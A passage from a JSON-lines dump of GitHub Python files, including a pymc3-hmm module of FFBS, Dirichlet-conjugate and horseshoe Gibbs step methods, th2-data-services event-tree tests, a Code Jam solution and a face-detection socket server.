drawer import *\n\nbk1 = Sphere(0, 0, 0, 0)\nbk2 = Sphere(0.5, 0.5, 0.5, 0)\nbk3 = Sphere(-0.6, -0.5, -0.5, 0)\nbk4 = Sphere(-0.5, 0.5, 0.5, 0)\nbk5 = Sphere(0.3, -0.7, -0.5, 0)\nbks1 = [bk1]\nbks2 = [bk1, bk2]\nbks3 = [bk1, bk2, bk3]\nbks4 = [bk1, bk2, bk3, bk4]\nbks5 = [bk1, bk2, bk3, bk4, bk5]\nblocks = [bks1, bks2, bks3, bks4, bks5]\n\nresult = compute(10, bks5)\n# for circle in result:\n# print circle.x, circle.y, circle.z, circle.r\n\nplot(result, bks3, None)","repo_name":"WqyJh/software_engineering","sub_path":"proj3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39513581059","text":"from datetime import datetime\n\nimport pytest\n\nfrom th2_data_services import Data\nfrom th2_data_services.provider.v5.commands.http import GetEvents\nfrom th2_data_services.provider.v5.data_source import HTTPProvider5DataSource\nfrom th2_data_services.provider.v5.events_tree.events_tree_collection import EventsTreeCollectionProvider5\n\n\n@pytest.mark.skip\ndef test_recover_unknown_events():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=50, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n before_tree = events.len\n collection = EventsTreeCollectionProvider5(events, data_source=data_source)\n after_tree = len(collection)\n\n assert not collection.detached_events and before_tree != after_tree\n\n\n@pytest.mark.skip\ndef test_recover_unknown_events_ds_passed_into_method():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n 
start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=50, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n before_tree = events.len\n collection = EventsTreeCollectionProvider5(events)\n collection.recover_unknown_events(data_source=data_source)\n after_tree = len(collection)\n\n assert not collection.detached_events and before_tree != after_tree\n\n\n@pytest.mark.skip\ndef test_recover_unknown_events_with_stub_events():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=50, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n broken_event = {\n \"attachedMessageIds\": [],\n \"batchId\": \"Broken_Event\",\n \"endTimestamp\": {\"nano\": 0, \"epochSecond\": 0},\n \"startTimestamp\": {\"nano\": 0, \"epochSecond\": 0},\n \"type\": \"event\",\n \"eventId\": f\"33499-333-111-test-03221\",\n \"eventName\": \"Broken_Event\",\n \"eventType\": \"Broken_Event\",\n \"parentEventId\": \"Broken_Event\",\n \"successful\": None,\n \"isBatched\": None,\n }\n events: list = [event for event in events] + [broken_event]\n\n before_tree = len(events)\n collection = EventsTreeCollectionProvider5(events, data_source=data_source, stub=True)\n after_tree = len(collection)\n\n assert collection.detached_events == {\"Broken_Event\": [broken_event]} and before_tree != after_tree\n\n\n@pytest.mark.skip\ndef test_preserve_body():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=0, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n collection = EventsTreeCollectionProvider5(events, data_source=data_source, preserve_body=True)\n\n assert all(\n [True if event.get(\"body\") is not None else False for event in collection.get_trees()[0].get_all_events()]\n )\n\n\n@pytest.mark.skip\ndef test_create_subtree_incoming_data_stream():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=0, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n tree = EventsTreeCollectionProvider5(events, preserve_body=True).get_trees()[0]\n etc_1 = EventsTreeCollectionProvider5(tree.findall(lambda e: e[\"eventName\"]), preserve_body=True)\n sub_tree_0 = etc_1.get_trees()[0]\n root_sub_tree_0 = sub_tree_0.get_root().copy()\n etc_2 = EventsTreeCollectionProvider5(tree.findall(lambda e: e[\"eventName\"]))\n assert root_sub_tree_0 != etc_2.get_trees()[0]\n assert root_sub_tree_0 == sub_tree_0.get_root()\n assert (\n root_sub_tree_0.get(\"body\") == [{\"data\": \"Root event\", \"type\": \"message\"}]\n and etc_2.get_trees()[0].get_root().get(\"body\") is None\n )\n","repo_name":"th2-net/th2-data-services","sub_path":"tests/tests_unit/tests_diff_version/tests_v5/tests_events_tree/test_events_tree_local.py","file_name":"test_events_tree_local.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} 
+{"seq_id":"23409538351","text":"#-*- coding:utf-8 -*-\r\n'''\r\nCreated on 2014年4月12日\r\n\r\n@author: wilbur\r\n'''\r\nimport string\r\n\r\n\r\n\r\n\r\ndef getCommon(listA,listB):\r\n counter =[]\r\n for i in listA:\r\n if i in listB:\r\n counter.append(i)\r\n return counter\r\n\r\nf=open(r'F:A-small-attempt0.in')\r\nfw=open(r'F:\\A-small.out','w')\r\ncaseNum=string.atoi(f.readline()) \r\n\r\n\r\n\r\n \r\n#测试caseNum个case\r\nfor i in range(caseNum): \r\n rowNOA=string.atoi(f.readline()) \r\n listA=[]\r\n for j in range(4):\r\n temp = f.readline().strip().split()\r\n listA.append(temp) \r\n rowNOB=string.atoi(f.readline()) \r\n \r\n listB=[]\r\n for k in range(4):\r\n temp = f.readline().strip().split()\r\n listB.append(temp) \r\n \r\n common= getCommon(listA[rowNOA-1],listB[rowNOB-1])\r\n \r\n if len(common)==0:\r\n fw.write('Case #{}: Volunteer cheated!\\n'.format(i+1))\r\n elif len(common)==1:\r\n fw.write('Case #{0}: {1}\\n'.format(i+1,common[0]))\r\n else:\r\n fw.write('Case #{}: Bad magician!\\n'.format(i+1))\r\n \r\nf.close()\r\nfw.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1022.py","file_name":"1022.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74920329794","text":"from scanner.scanner import Scanenr\nfrom parsr.grammar import Grammar\nfrom parsr.initialize import Initializer\nfrom parsr.parser import Parser\nfrom Symbols.symbol_table import SymbolTable , Token , TokenType\nfrom codegen.codegen import CodeGen\n\n################### parser output is in report/parser #################################################\n# amirmahdi hosseinabadi 97110069\n# amirhossein alimohammadi 97110166\n\n\n\n\ninitialize = Initializer()\ng = Grammar('parsr/', initialize)\nparse_table = g.get_parse_table()\nsymbol = SymbolTable()\nsymbol.add_symbol(Token(TokenType.ID, \"output\"))\nsymbol.fetch(\"output\").address = 5\nscannar1 = Scanenr(\"input.txt\", symbol)\ncodegen = CodeGen(scannar1.fw.symbol_tables)\np = Parser(scannar1, parse_table, initialize, codegen)\ncodegen.end_code()\ncodegen.semantic_analyser.writer()\nif len(codegen.semantic_analyser.errors) > 0 :\n codegen.output_writer()\n\n\ndef pretty(d, indent=0):\n for key, value in d.items():\n print('\\t' * indent + str(key))\n if isinstance(value, dict):\n pretty(value, indent + 1)\n else:\n print('\\t' * (indent + 1) + str(value))\n\n# print(symbol.symbol_table)\n# print(symbol.IDs)","repo_name":"alimohammadiamirhossein/cminus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18971928681","text":"from functools import singledispatch\nfrom itertools import chain\nfrom typing import Callable, Tuple\n\nimport numpy as np\nimport pymc3 as pm\nimport scipy\nimport theano.scalar as ts\nimport theano.tensor as tt\nfrom pymc3.distributions.distribution import draw_values\nfrom pymc3.step_methods.arraystep import ArrayStep, BlockedStep, Competence\nfrom pymc3.util import get_untransformed_name\nfrom scipy.stats import invgamma\nfrom theano import config\nfrom theano.compile import optdb\nfrom theano.graph.basic import Variable, graph_inputs\nfrom theano.graph.fg import FunctionGraph\nfrom theano.graph.op import get_test_value as test_value\nfrom theano.graph.opt import OpRemove, pre_greedy_local_optimizer\nfrom theano.graph.optdb import Query\nfrom 
theano.sparse.basic import StructuredDot\nfrom theano.tensor.basic import Dot\nfrom theano.tensor.elemwise import DimShuffle, Elemwise\nfrom theano.tensor.subtensor import AdvancedIncSubtensor1\nfrom theano.tensor.var import TensorConstant\n\nfrom pymc3_hmm.distributions import DiscreteMarkovChain, HorseShoe, SwitchingProcess\nfrom pymc3_hmm.utils import compute_trans_freqs\n\nbig: float = 1e20\nsmall: float = 1.0 / big\n\n\ndef ffbs_step(\n gamma_0: np.ndarray,\n Gammas: np.ndarray,\n log_lik: np.ndarray,\n alphas: np.ndarray,\n out: np.ndarray,\n):\n \"\"\"Sample a forward-filtered backward-sampled (FFBS) state sequence.\n\n Parameters\n ----------\n gamma_0\n The initial state probabilities.\n Gamma\n The transition probability matrices. This array should take the shape\n ``(N, M, M)``, where ``N`` is the state sequence length and ``M`` is\n the number of distinct states. If ``N`` is ``1``, the single\n transition matrix will broadcast across all elements of the state\n sequence.\n log_lik\n An array of shape `(M, N)` consisting of the log-likelihood values for\n each state value at each point in the sequence.\n alphas\n An array in which to store the forward probabilities.\n out\n An output array to be updated in-place with the posterior sample\n states.\n\n \"\"\"\n # Number of observations\n N: int = log_lik.shape[-1]\n\n # Number of states\n M: int = gamma_0.shape[-1]\n # assert M == log_lik.shape[-2]\n\n # Initial state probabilities\n gamma_0_normed: np.ndarray = gamma_0.copy()\n gamma_0_normed /= np.sum(gamma_0)\n\n # Previous forward probability\n alpha_nm1: np.ndarray = gamma_0_normed\n\n # Make sure we have a transition matrix for each element in a state\n # sequence\n Gamma: np.ndarray = np.broadcast_to(Gammas, (N,) + Gammas.shape[-2:])\n\n lik_n: np.ndarray = np.empty((M,), dtype=float)\n alpha_n: np.ndarray = np.empty((M,), dtype=float)\n\n # Forward filtering\n for n in range(N):\n log_lik_n: np.ndarray = log_lik[..., n]\n np.exp(log_lik_n - log_lik_n.max(), out=lik_n)\n np.dot(alpha_nm1, Gamma[n], out=alpha_n)\n alpha_n *= lik_n\n alpha_n_sum: float = np.sum(alpha_n)\n\n # Rescale small values\n if alpha_n_sum < small:\n alpha_n *= big\n\n alpha_nm1 = alpha_n\n alphas[..., n] = alpha_n\n\n # The uniform samples used to sample the categorical states\n unif_samples: np.ndarray = np.random.uniform(size=out.shape)\n\n alpha_N: np.ndarray = alphas[..., N - 1]\n beta_N: np.ndarray = alpha_N / alpha_N.sum()\n\n state_np1: np.ndarray = np.searchsorted(beta_N.cumsum(), unif_samples[N - 1])\n\n out[N - 1] = state_np1\n\n beta_n: np.ndarray = np.empty((M,), dtype=float)\n\n # Backward sampling\n for n in range(N - 2, -1, -1):\n np.multiply(alphas[..., n], Gamma[n + 1, :, state_np1], out=beta_n)\n beta_n /= np.sum(beta_n)\n\n state_np1 = np.searchsorted(beta_n.cumsum(), unif_samples[n])\n out[n] = state_np1\n\n return out\n\n\nclass FFBSStep(BlockedStep):\n r\"\"\"Forward-filtering backward-sampling steps.\n\n For a hidden Markov model with state sequence :math:`S_t`, observations\n :math:`y_t`, and parameters :math:`\\theta`, this step method samples\n\n .. 
math::\n\n S_T &\\sim \\operatorname{P}\\left( S_T \\mid y_{1:T}, \\theta \\right)\n \\\\\n S_t \\mid S_{t+1} &\\sim \\operatorname{P}\\left( S_{t+1} \\mid S_t, \\theta \\right)\n \\operatorname{P}\\left( S_{t+1} \\mid y_{1:T}, \\theta \\right)\n\n \"\"\"\n\n name = \"ffbs\"\n\n def __init__(self, vars, values=None, model=None):\n\n if len(vars) > 1:\n raise ValueError(\"This sampler only takes one variable.\")\n\n (var,) = pm.inputvars(vars)\n\n if not isinstance(var.distribution, DiscreteMarkovChain):\n raise TypeError(\"This sampler only samples `DiscreteMarkovChain`s.\")\n\n model = pm.modelcontext(model)\n\n self.vars = [var]\n\n self.dependent_rvs = [\n v\n for v in model.basic_RVs\n if v is not var and var in graph_inputs([v.logpt])\n ]\n\n dep_comps_logp_stacked = []\n for i, dependent_rv in enumerate(self.dependent_rvs):\n if isinstance(dependent_rv.distribution, SwitchingProcess):\n comp_logps = []\n\n # Get the log-likelihoood sequences for each state in this\n # `SwitchingProcess` observations distribution\n for comp_dist in dependent_rv.distribution.comp_dists:\n comp_logps.append(comp_dist.logp(dependent_rv))\n\n comp_logp_stacked = tt.stack(comp_logps)\n else:\n raise TypeError(\n \"This sampler only supports `SwitchingProcess` observations\"\n )\n\n dep_comps_logp_stacked.append(comp_logp_stacked)\n\n comp_logp_stacked = tt.sum(dep_comps_logp_stacked, axis=0)\n\n (M,) = draw_values([var.distribution.gamma_0.shape[-1]], point=model.test_point)\n N = model.test_point[var.name].shape[-1]\n self.alphas = np.empty((M, N), dtype=float)\n\n self.log_lik_states = model.fn(comp_logp_stacked)\n self.gamma_0_fn = model.fn(var.distribution.gamma_0)\n self.Gammas_fn = model.fn(var.distribution.Gammas)\n\n def step(self, point):\n gamma_0 = self.gamma_0_fn(point)\n # TODO: Can we update these in-place (e.g. using a shared variable)?\n Gammas_t = self.Gammas_fn(point)\n # TODO: Can we update these in-place (e.g. using a shared variable)?\n log_lik_state_vals = self.log_lik_states(point)\n ffbs_step(\n gamma_0, Gammas_t, log_lik_state_vals, self.alphas, point[self.vars[0].name]\n )\n return point\n\n @staticmethod\n def competence(var):\n distribution = getattr(var.distribution, \"parent_dist\", var.distribution)\n\n if isinstance(distribution, DiscreteMarkovChain):\n return Competence.IDEAL\n # elif isinstance(distribution, pm.Bernoulli) or (var.dtype in pm.bool_types):\n # return Competence.COMPATIBLE\n\n return Competence.INCOMPATIBLE\n\n\nclass TransMatConjugateStep(ArrayStep):\n r\"\"\"Conjugate update steps for a transition matrix with Dirichlet distributed rows conditioned on a state sequence.\n\n For a hidden Markov model given by\n\n .. math::\n\n \\Gamma_k &\\sim \\operatorname{Dir}\\left( \\alpha_k \\right),\n \\quad k \\in \\{1, \\dots, M\\} \\; \\text{and} \\;\n \\alpha_k \\in \\mathbb{R}^{M}, \\; \\Gamma_k \\in \\mathbb{R}^{M \\times M}\n \\\\\n S_t &\\sim \\operatorname{Cat}\\left( \\Gamma^\\top \\pi_t \\right)\n\n this step method samples\n\n .. math::\n\n \\Gamma_j &\\sim \\operatorname{P}\\left( \\Gamma_j \\mid S_{1:T}, y_{1:T} \\right)\n \\\\\n &\\sim \\operatorname{Dir}\\left( \\alpha_j + N_j \\right)\n\n\n where :math:`N_j \\in \\mathbb{R}^{M}` are counts of observed state\n transitions :math:`j \\to k` for :math:`k \\in \\{1, \\dots, K\\}` conditional\n on :math:`S_{1:T}`.\n\n Dirichlet priors can also be embedded in larger transition matrices through\n `theano.tensor.set_subtensor` `Op`s. 
See\n    `TransMatConjugateStep._set_row_mappings`.\n\n    \"\"\"  # noqa: E501\n\n    name = \"trans-mat-conjugate\"\n\n    def __init__(self, model_vars, values=None, model=None, rng=None):\n        \"\"\"Initialize a `TransMatConjugateStep` object.\"\"\"\n\n        model = pm.modelcontext(model)\n\n        if isinstance(model_vars, Variable):\n            model_vars = [model_vars]\n\n        model_vars = list(chain.from_iterable([pm.inputvars(v) for v in model_vars]))\n\n        # TODO: Are the rows in this matrix our `dir_priors`?\n        dir_priors = []\n        self.dir_priors_untrans = []\n        for d in model_vars:\n            untrans_var = model.named_vars[get_untransformed_name(d.name)]\n            if isinstance(untrans_var.distribution, pm.Dirichlet):\n                self.dir_priors_untrans.append(untrans_var)\n                dir_priors.append(d)\n\n        state_seqs = [\n            v\n            for v in model.vars + model.observed_RVs\n            if isinstance(v.distribution, DiscreteMarkovChain)\n            and all(d in graph_inputs([v.distribution.Gammas]) for d in dir_priors)\n        ]\n\n        if not self.dir_priors_untrans or not len(state_seqs) == 1:\n            raise ValueError(\n                \"This step method requires a set of Dirichlet priors\"\n                \" that comprise a single transition matrix\"\n            )\n\n        (state_seq,) = state_seqs\n\n        Gamma = state_seq.distribution.Gammas\n\n        self._set_row_mappings(Gamma, dir_priors, model)\n\n        if len(self.row_remaps) != len(dir_priors):\n            raise TypeError(\n                \"The Dirichlet priors could not be found\"\n                \" in the graph for {}\".format(state_seq.distribution.Gammas)\n            )\n\n        if state_seq in model.observed_RVs:\n            self.state_seq_obs = np.asarray(state_seq.distribution.data)\n\n        self.rng = rng\n        self.dists = list(dir_priors)\n        self.state_seq_name = state_seq.name\n\n        super().__init__(dir_priors, [], allvars=True)\n\n    def _set_row_mappings(self, Gamma, dir_priors, model):\n        \"\"\"Create maps from Dirichlet prior parameters to rows and slices in the transition matrix.\n\n        These maps are needed when a transition matrix isn't simply comprised\n        of Dirichlet prior rows, but--instead--slices of Dirichlet priors.\n\n        Consider the following:\n\n        .. code-block:: python\n\n            with pm.Model():\n                d_0_rv = pm.Dirichlet(\"p_0\", np.r_[1, 1])\n                d_1_rv = pm.Dirichlet(\"p_1\", np.r_[1, 1])\n\n                p_0_rv = tt.as_tensor([0, 0, 1])\n                p_1_rv = tt.zeros(3)\n                p_1_rv = tt.set_subtensor(p_1_rv[[0, 2]], d_0_rv)\n                p_2_rv = tt.zeros(3)\n                p_2_rv = tt.set_subtensor(p_2_rv[[1, 2]], d_1_rv)\n\n                P_tt = tt.stack([p_0_rv, p_1_rv, p_2_rv])\n\n        The transition matrix `P_tt` has Dirichlet priors in only two of its\n        three rows, and--even then--they're only present in parts of two rows.\n\n        In this example, we need to know that Dirichlet prior 0, i.e. `d_0_rv`,\n        is mapped to row 1, and prior 1 is mapped to row 2. 
Furthermore, we\n need to know that prior 0 fills columns 0 and 2 in row 1, and prior 1\n fills columns 1 and 2 in row 2.\n\n These mappings allow one to embed Dirichlet priors in larger transition\n matrices with--for instance--fixed transition behavior.\n\n \"\"\" # noqa: E501\n\n # Remove unimportant `Op`s from the transition matrix graph\n Gamma = pre_greedy_local_optimizer(\n FunctionGraph([], []),\n [\n OpRemove(Elemwise(ts.Cast(ts.float32))),\n OpRemove(Elemwise(ts.Cast(ts.float64))),\n OpRemove(Elemwise(ts.identity)),\n ],\n Gamma,\n )\n\n # Canonicalize the transition matrix graph\n fg = FunctionGraph(\n list(graph_inputs([Gamma] + self.dir_priors_untrans)),\n [Gamma] + self.dir_priors_untrans,\n clone=True,\n )\n canonicalize_opt = optdb.query(Query(include=[\"canonicalize\"]))\n canonicalize_opt.optimize(fg)\n Gamma = fg.outputs[0]\n dir_priors_untrans = fg.outputs[1:]\n fg.disown()\n\n Gamma_DimShuffle = Gamma.owner\n\n if not (isinstance(Gamma_DimShuffle.op, DimShuffle)):\n raise TypeError(\"The transition matrix should be non-time-varying\")\n\n Gamma_Join = Gamma_DimShuffle.inputs[0].owner\n\n if not (isinstance(Gamma_Join.op, tt.basic.Join)):\n raise TypeError(\n \"The transition matrix should be comprised of stacked row vectors\"\n )\n\n Gamma_rows = Gamma_Join.inputs[1:]\n\n self.n_rows = len(Gamma_rows)\n\n # Loop through the rows in the transition matrix's graph and determine\n # how our transformed Dirichlet RVs map to this transition matrix.\n self.row_remaps = {}\n self.row_slices = {}\n for i, dim_row in enumerate(Gamma_rows):\n if not dim_row.owner:\n continue\n\n # By-pass the `DimShuffle`s applied to the `AdvancedIncSubtensor1`\n # `Op`s in which we're actually interested\n gamma_row = dim_row.owner.inputs[0]\n\n if gamma_row in dir_priors_untrans:\n # This is a row that's simply a `Dirichlet`\n j = dir_priors_untrans.index(gamma_row)\n self.row_remaps[j] = i\n self.row_slices[j] = slice(None)\n\n if gamma_row.owner.inputs[1] not in dir_priors_untrans:\n continue\n\n # Parts of a row set by a `*Subtensor*` `Op` using a full\n # `Dirichlet` e.g. `P_row[idx] = dir_rv`\n j = dir_priors_untrans.index(gamma_row.owner.inputs[1])\n untrans_dirich = dir_priors_untrans[j]\n\n if (\n gamma_row.owner\n and isinstance(gamma_row.owner.op, AdvancedIncSubtensor1)\n and gamma_row.owner.inputs[1] == untrans_dirich\n ):\n self.row_remaps[j] = i\n\n rhand_val = gamma_row.owner.inputs[2]\n if not isinstance(rhand_val, TensorConstant):\n # TODO: We could allow more types of `idx` (e.g. 
slices)\n # Currently, `idx` can't be something like `2:5`\n raise TypeError(\n \"Only array indexing allowed for mixed\"\n \" Dirichlet/non-Dirichlet rows\"\n )\n self.row_slices[j] = rhand_val.data\n\n def astep(self, point, inputs):\n\n states = getattr(self, \"state_seq_obs\", None)\n if states is None:\n states = inputs[self.state_seq_name]\n\n N_mat = compute_trans_freqs(states, self.n_rows, counts_only=True)\n\n trans_res = [\n d.distribution.dist.transform.forward_val(\n np.random.dirichlet(\n test_value(d.distribution.dist.a)\n + N_mat[self.row_remaps[i]][self.row_slices[i]]\n )\n )\n for i, d in enumerate(self.dists)\n ]\n\n sample = np.stack(trans_res, 1)\n\n return sample.reshape(point.shape)\n\n @staticmethod\n def competence(var):\n\n # TODO: Check that the dependent term is a conjugate type.\n\n distribution = getattr(var.distribution, \"parent_dist\", var.distribution)\n\n if isinstance(distribution, pm.Dirichlet):\n return Competence.COMPATIBLE\n\n return Competence.INCOMPATIBLE\n\n\ndef large_p_mvnormal_sampler(D_diag, Phi, a):\n r\"\"\"Efficiently sample from a large multivariate normal.\n\n This function draws samples from the following distribution:\n\n .. math::\n \\beta \\sim \\operatorname{N}\\left( \\mu, \\Sigma \\right)\n\n where\n\n .. math::\n \\mu = \\Sigma \\Phi^\\top a, \\\\\n \\Sigma = \\left( \\Phi^\\top \\Phi + D^{-1} \\right)^{-1}\n\n and :math:`a \\in \\mathbb{R}^{n}`, :math:`\\Phi \\in \\mathbb{R}^{n \\times p}`.\n\n This approach is particularly effective when :math:`p \\gg n`.\n\n From \"Fast sampling with Gaussian scale-mixture priors in high-dimensional\n regression\", Bhattacharya, Chakraborty, and Mallick, 2015.\n\n \"\"\"\n N = a.shape[0]\n u = np.random.normal(0, np.sqrt(D_diag))\n delta = np.random.normal(size=N)\n if scipy.sparse.issparse(Phi):\n Phi_D = Phi.multiply(D_diag)\n v = Phi * u + delta\n Z = (Phi_D * Phi.T + scipy.sparse.eye(N)).toarray()\n w = scipy.linalg.solve(Z, a - v, assume_a=\"sym\")\n beta = u + Phi_D.T * w\n else:\n Phi_D = Phi * D_diag\n v = Phi.dot(u) + delta\n Z = Phi_D.dot(Phi.T)\n Z.flat[:: N + 1] += 1\n w = scipy.linalg.solve(Z, a - v, assume_a=\"sym\")\n beta = u + Phi_D.T @ w\n return beta\n\n\ndef hs_step(\n lambda2: np.ndarray,\n tau2: np.ndarray,\n vi: np.ndarray,\n xi: np.ndarray,\n X: np.ndarray,\n y: np.ndarray,\n):\n _, M = X.shape\n\n D_diag = tau2 * lambda2\n beta = large_p_mvnormal_sampler(D_diag, X, y)\n beta2 = beta ** 2\n\n lambda2 = invgamma(a=1, scale=1 / vi + beta2 / (2 * tau2)).rvs()\n tau2 = invgamma(a=(M + 1) / 2, scale=1 / xi + (beta2 / lambda2).sum() / 2).rvs()\n vi = invgamma(a=1, scale=1 + 1 / lambda2).rvs()\n xi = invgamma(a=1, scale=1 + 1 / tau2).rvs()\n\n return beta, lambda2, tau2, vi, xi\n\n\n@singledispatch\ndef hs_regression_model(dist: pm.Distribution, rv, model) -> Tuple[Callable, Variable]:\n \"\"\"Determine the normal regression model for a Horseshoe sampler.\n\n Return a function that computes the normal regression: i.e. the observation\n vector and regression matrix.\n\n For non-normal distributions, the normal regression model is an\n approximation (e.g. 
Polya-Gamma).\n \"\"\" # noqa: E501\n raise NotImplementedError()\n\n\n@hs_regression_model.register(pm.Normal)\ndef hs_regression_model_Normal(dist, rv, model):\n mu = dist.mu\n y_X_fn = None\n if hasattr(rv, \"observations\"):\n obs = tt.as_tensor_variable(rv.observations)\n obs_fn = model.fn(obs)\n\n def y_X_fn(points, X):\n return obs_fn(points), X\n\n return y_X_fn, mu\n\n\n@hs_regression_model.register(pm.NegativeBinomial)\ndef hs_regression_model_NegativeBinomial(dist, rv, model):\n\n mu = tt.as_tensor_variable(dist.mu)\n\n if mu.owner and mu.owner.op == tt.exp:\n eta = mu.owner.inputs[0]\n else:\n eta = mu\n\n alpha = tt.as_tensor_variable(dist.alpha)\n if hasattr(rv, \"observations\"):\n from polyagamma import random_polyagamma\n\n obs = tt.as_tensor_variable(rv.observations)\n h_z_alpha_fn = model.fn(\n [\n alpha + obs,\n eta.squeeze() - tt.log(alpha),\n alpha,\n obs,\n ]\n )\n\n def y_X_fn(points, X):\n h, z, alpha, obs = h_z_alpha_fn(points)\n\n omega = random_polyagamma(h, z)\n\n V_diag_inv = np.abs(omega)\n sigma2 = 1 / V_diag_inv\n sigma = np.sqrt(sigma2)\n\n if scipy.sparse.issparse(X):\n Phi = (X.T.multiply(np.sqrt(V_diag_inv))).T\n else:\n Phi = (X.T * np.sqrt(V_diag_inv)).T\n\n y_aug = np.log(alpha) + (obs - alpha) / (2.0 * omega)\n y_aug = (y_aug / sigma).astype(config.floatX)\n return y_aug, Phi\n\n return y_X_fn, eta\n\n return None, eta\n\n\ndef find_dot(node, beta, model, y_fn):\n if not node.owner:\n return\n # dense dot\n if isinstance(node.owner.op, Dot):\n if beta in node.owner.inputs:\n X_fn = model.fn(node.owner.inputs[1].T)\n return node, X_fn, y_fn\n # sprase dot\n if isinstance(node.owner.op, StructuredDot):\n if beta in node.owner.inputs[1].owner.inputs:\n X_fn = model.fn(node.owner.inputs[0])\n return node, X_fn, y_fn\n else:\n # if exp transformation\n if isinstance(node.owner.op, tt.elemwise.Elemwise):\n res = find_dot(node.owner.inputs[0], beta, model, y_fn)\n if res:\n node, X_fn, _ = res\n return node, X_fn, y_fn\n\n\nclass HSStep(BlockedStep):\n name = \"hsgibbs\"\n\n def __init__(self, vars, values=None, model=None):\n model = pm.modelcontext(model)\n\n if len(vars) > 1:\n raise ValueError(\"This sampler only takes one variable.\")\n\n (beta,) = pm.inputvars(vars)\n\n if not isinstance(beta.distribution, HorseShoe):\n raise TypeError(\"This sampler only samples `HorseShoe`s.\")\n\n other_model_vars = [\n value for attr, value in model.named_vars.items() if value != beta\n ]\n y_X_fn, X_fn = None, None\n\n for var in other_model_vars:\n # Look through all the attributes of the variable and see if any of\n # the parameters have a multiplication relationship with the\n # Horseshoe variable\n if hasattr(var, \"distribution\"):\n try:\n y_X_fn, eta = hs_regression_model(var.distribution, var, model)\n except NotImplementedError:\n continue\n elif isinstance(var, pm.model.DeterministicWrapper):\n eta = var.owner.inputs[0]\n if eta.owner:\n eta_X_fn = find_dot(eta, beta, model, y_X_fn)\n if not eta_X_fn:\n continue\n eta, X_fn, y_X_fn = eta_X_fn\n else:\n continue # pragma: no cover\n\n if not y_X_fn:\n # We don't have the observation distribution, so we need to\n # find it. 
This happens when a `Deterministic` bridges a\n # `Horseshoe` parameter with it's observation distribution's\n # mean.\n y_X_fn = None\n obs_mu = None\n for obs_rv in model.observed_RVs:\n try:\n y_X_fn, obs_mu = hs_regression_model(\n obs_rv.distribution, obs_rv, model\n )\n break\n except NotImplementedError:\n continue\n\n # The `Deterministic` should be the mean parameter of the\n # observed distribution\n if var != obs_mu:\n continue\n\n if not (X_fn and y_X_fn):\n raise NotImplementedError(\n f\"Cannot find a design matrix or dependent variable associated with {beta}\" # noqa: E501\n )\n\n self.vars = [beta]\n\n M = model.test_point[beta.name].shape[-1]\n\n # if observation dist is normal then y_aug_fn = y_fn when it is NB\n # then, hs_regression_model, dispatch i.distribution...\n self.vi = np.full(M, 1)\n self.lambda2 = np.full(M, 1)\n self.beta = np.full(M, 1)\n self.tau2 = 1\n self.xi = 1\n self.y_X_fn = y_X_fn\n self.X_fn = X_fn\n\n def step(self, point):\n X = self.X_fn(point)\n y, X = self.y_X_fn(point, X)\n self.beta, self.lambda2, self.tau2, self.vi, self.xi = hs_step(\n self.lambda2, self.tau2, self.vi, self.xi, X, y\n )\n point[self.vars[0].name] = self.beta\n return point\n","repo_name":"AmpersandTV/pymc3-hmm","sub_path":"pymc3_hmm/step_methods.py","file_name":"step_methods.py","file_ext":"py","file_size_in_byte":23220,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"61"} +{"seq_id":"12695771253","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport math\nfrom sklearn.decomposition import PCA\nimport os\nimport time\nimport glob\nimport face_detection.src.facenet as facenet\nimport face_detection.src.align.detect_face as detect_face\nfrom json_socket import Server\nimport msgpack\n\nBIND_IP = \"127.0.0.1\"\nBIND_PORT = 9879 \n\nclass FaceDetector:\n\n def __init__(self):\n self.socket = Server(BIND_IP, BIND_PORT)\n self.socket.accept()\n\n def load_model(self, pb_path, image_size=(160,160)):\n tf.compat.v1.reset_default_graph()\n\n single_image = tf.compat.v1.placeholder(tf.int32, (None, None, 3))\n float_image = tf.cast(single_image, tf.float32)\n float_image = float_image / 255\n batch_image = tf.expand_dims(float_image, 0)\n resized_image = tf.image.resize(batch_image, image_size)\n\n phase_train = tf.compat.v1.placeholder_with_default(False, shape=[])\n input_map = {'image_batch':resized_image, 'phase_train':phase_train}\n model = facenet.load_model(pb_path, input_map)\n\n embeddings = 